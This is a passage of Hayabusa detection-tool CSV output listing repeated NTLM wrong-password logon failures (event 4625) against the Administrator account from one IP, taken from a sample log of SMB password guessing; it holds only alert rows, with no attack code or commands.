+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UytgJLBtGRMCf3ar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yno9399gUI2oBr4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbsqE98qy27Sp0UJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RjXtDnXvCXSJ2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EdRXJJ1RCl8n9bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tnwGNp2ncfcBlFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iGKEloPpd6CtrSlg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBvHz5iKl0dl97xj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: 
